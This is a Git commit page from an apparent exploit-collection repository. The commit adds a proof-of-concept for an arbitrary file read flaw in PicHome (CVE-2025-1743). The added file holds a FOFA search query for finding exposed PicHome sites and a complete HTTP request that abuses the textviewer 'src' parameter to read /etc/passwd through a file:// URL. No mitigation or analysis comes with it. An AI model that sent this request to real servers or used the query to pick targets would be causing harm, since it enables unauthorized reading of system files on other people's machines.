admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-06-20 18:01:14 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update Pichome接口index存在任意文件读取(CVE-2025-1743).md

Browse Source
This commit is contained in:
Rainyseason 2025-06-11 15:04:39 +08:00 committed by GitHub
parent 1d0e69bc33
commit c73be94205
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 18 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
wpoc/Pichome/Pichome接口index存在任意文件读取(CVE-2025-1743).md
View File

@ -1 +1,19 @@
# Pichome接口index存在任意文件读取(CVE-2025-1743)
# fofa
```
title="PicHome"
```
# poc
```javascript
GET /index.php?mod=textviewer&src=file:///etc/passwd HTTP/1.1
Host:
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
```